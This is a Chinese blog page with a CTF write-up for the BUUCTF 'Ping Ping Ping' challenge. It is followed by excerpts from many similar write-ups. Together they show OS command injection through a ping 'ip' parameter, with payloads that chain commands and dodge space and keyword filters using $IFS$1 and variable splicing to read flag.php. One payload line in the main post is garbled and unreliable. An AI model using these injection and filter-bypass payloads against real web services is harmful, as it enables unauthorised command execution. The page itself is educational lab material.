buuctf [GXYCTF2019]Ping Ping Ping 1

于 2024-08-28 22:46:07 发布
阅读量131 收藏
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44761422/article/details/141651593
版权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
看来这里空格被过滤了

以下方法可以绕过空格
在这里插入图片描述
一个一个试发现$IFS$1是行得通的

那便构造:?ip=127.0.0.1;cat$IFS$1flag.php

/?ip=127.0.0.1;a=g;cat$IFS 1 f l a 1fla 1flaa.php,查看源代码得到flag
在这里插入图片描述
flag{784d65dc-defd-407d-9d1f-748c65c6ddb1}

程序菜鸡的日常
关注
BUU CTF [GXYCTF2019]Ping Ping Ping 1
qiaopeifan的博客
01-26 505
BUU CTF [GXYCTF2019]Ping Ping Ping 1打开题目,页面显示/?ip= 应该是一个传参的提示。 结合题目的ping。尝试?ip=1 1.看到ip很明显传一个Ip看看 作为菜鸟,我根据自己的判断认为通过Ip传输方式认为是linux所以我们可以在这里输入linux命令常用的就是ls 2.我们看到两个文件,完了进行访问,但是发现flag.php访问不了,大概是说有空格, 判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用 注:%20(space)、%09(t
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5284
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
BUUCTF[GXYCTF2019]Ping Ping Ping 1
徐海洋
02-01 400
[GXYCTF2019]Ping Ping Ping 1
BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 6078
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
BUUCTF-[GXYCTF2019]Ping Ping Ping1
Monica的博客
09-13 638
目录 题目:​ 分析: 方法: 方法1: 方法2: 方法3: 题目: 提示get传入一个ip的值,猜测是exec函数执行一个外部程序。 分析: 使用;同时执行前面和后面的命令 相关知识点 payload:?ip=127.0.0.1;ls 发现flag payload:?ip=127.0.0.1;tac flag.php 通过测试发现,过滤了空格、<、>、{、}、flag、*、?、'、"、)、[、]、/等 在linux 空格可以用以下字符串...
BUUCTF[GXYCTF2019]Ping Ping Ping
楼阁de猫的博客
12-19 300
[GXYCTF2019]Ping Ping Ping 直接ping 127.0.0.1 有回显,ls一下 发现flag.php,cat一下 事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法 $IFS ${IFS} $IFS$9 //$9改成 $ 加其他数字貌似都行 < <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09(Tab) 这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 3239
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
buuctf [GXYCTF2019]Ping Ping Ping!
hintll的博客
06-10 1140
[GXYCTF2019]Ping Ping Ping! 这个题目的标题是ping ping ping 打开以后是这样的 先是看到这个提示,看到?第一想到的就是get,那么就先get一个ip上去 然后有一行回显 应该是命令执行漏洞 命令执行就用命令拼接符执行漏洞命令就行 命令拼接符: |、||、&、&&的区别: &:无论左边是false还是true,右边都执行 &&:具有短路效果,左边是false,右边不执行。 |:无论左边是false还是true,右边都会执
buuctf [GXYCTF2019]Ping Ping Ping学习笔记
haoxue__的博客
05-11 520
学习笔记
BUUCTF—[GXYCTF2019]Ping Ping Ping1
qq_57778984的博客
10-22 401
内联绕过就是将反引号内命令的输出结果作为另一个命令的输入来执行,比如系统对flag字符进行了过滤,但是单独使用ls命令时又会回显出index.php和flag.php文件,那么我们可以通过ls命令将index.php和flag.php作为输入,通过cat查看两个文件获取flag,而不用输入cat flag.php触发关键词。3.尝试在执行ping命令后执行其他命令,用";连接两个命令时,第二个命令只有在第一个命令执行成功的情况下才会执行。连接两个命令时,第二个命令只有在第一个命令执行失败的情况下才会执行。
BUUCTF WEB [GXYCTF2019]Ping Ping Ping1
guishengyx的博客
10-19 206
直接试试传参ip 他确实去ping了 昨天也碰到过一个差不多的题目 所以试一下linux的指令 ?ip=192.168.1.1;ls 成功了 果然是linux 尝试打开flag.php 看提示应该是过滤了空格 上百度找到了几种代替空格的方法 %20(space)、%09(tab)、$IFS$9、${IFS}$9、 {IFS}、IFS 测试发现括号也被过滤了 所以使用$IFS$9代替空格 继续打开flag.php 还是失败了 试试打开index.php c...
BUUCTF】[GXYCTF2019]Ping Ping Ping 1
manerzi的博客
12-16 312
BUUCTF】[GXYCTF2019]Ping Ping Ping 1
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1830
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
BUUCTF系列 // [GXYCTF2019] Ping Ping Ping
qq_45805420的博客
10-01 437
前言 本题知识点:命令执行漏洞 WP 打开题目页面,提示很明显,那就先随便 ping 个 IP 地址看看效果 可以看到系统命令被正常执行了,有正确回显 接下来尝试一下是否存在命令执行漏洞,首先用 ls 试一试,看看有没有提示 flag 所在的位置 发现确实存在着命令执行,并且得到了新的线索 先试着直接用 cat 命令读取 flag.php 文件的内容 题目报了个错,(初看没太明白这个提示,后来结合其他的报错,意识到此处原因为空格被过滤了) 既然题目过滤了空格,那就用绕过试试呗 PS:命令执行漏洞,绕过
BUU 命令执行-[GXYCTF2019]Ping Ping Ping
Ivyyyyyy1的博客
11-07 272
一、题目 总有些题喜欢打着ping的名义,做着命令执行的事 我们便先pingping罢 没什么异常 这里根据经验,猜测是用到了shell_exec()、exec()等等这种函数 二、解题 我们在ip的参数值里面加入管道符 | ,即把 | 之前的命令输出结果作为 | 之后的命令参数 而 ls 不存在参数,所以不会被影响 这样我们查到了flag文件就在目录下 直接cat出来 这里根据返回的结果来看,后台应该是把空格过滤了 查了一下知乎上面绕过空格过滤的方法 ...
ctf题集【BUUCTF WEB】[GXYCTF2019]Ping Ping Ping 1
最新发布
qq_42667028的博客
12-19 549
说明空格被限制了,多次尝试发现$IFS$1可以绕过,尝试输入/?发现flag.php在当前目录下,那么就需要查看这个文件,尝试输入/?看来*也被限制了,那么尝试'''、''、\、$1、都无法绕过,换个思路,用base64绕过。flag也被限制了,那么尝试/?cat$IFS$1fla*尝试能否用管道符执行,输入参数/?ip=127.0.0.1后成功执行。
buuctf ping ping ping1
weixin_74020633的博客
10-24 64
看看还有什么方法,发现代码里有$a,试试能不能覆盖变量(我的理解是通过将flag赋给定义的变量,在用变量覆盖flag,来绕过过滤)使用127.0.0.1|ls,成功查看,根据以往学习,该cat flag.php来拿到flag,所以先尝试。flag也被过滤了,寄,不清楚他是过滤了多少,看看index.php,会不会有意外收获。这里使用了&连接查看,但是没有显示,可能是符号被过滤,换一种符号。主要flag和*都被过滤了(想销毁靶机了,测)把g赋给a,引用a,绕过过滤,也可以把f,l,a,g都这样做。
[GXYCTF2019]Ping Ping Ping
09-14
[GXYCTF2019]Ping Ping Ping是一道关于命令注入的题目。在提供的引用中,我们可以看到一个简单的PHP代码段,通过传递ip参数进行ping命令的执行。同时,引用中还给出了一些限制条件,如禁止使用特殊符号、空格、bash命令以及含有"flag"字符等。 根据引用中的代码,我们可以看到如果传递的ip参数满足特定的匹配条件,会输出相应的错误信息并结束程序。因此,我们需要绕过这些匹配条件来执行命令注入。 根据引用中的代码,我们可以看到在ip参数的检查中,会通过正则表达式匹配来判断是否包含特定的符号。因此,我们可以利用一些绕过技巧来绕过这些过滤条件。 最后,引用中给出了一种构造payload的方法。其中,可以通过使用简单变量替换来覆盖拼接flag。具体来说,我们可以将ip参数设置为"127.0.0.1;a=g;cat$IFS$1fla$a.php",这样就可以绕过过滤条件并执行cat命令来获取flag内容。 综上所述,***
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值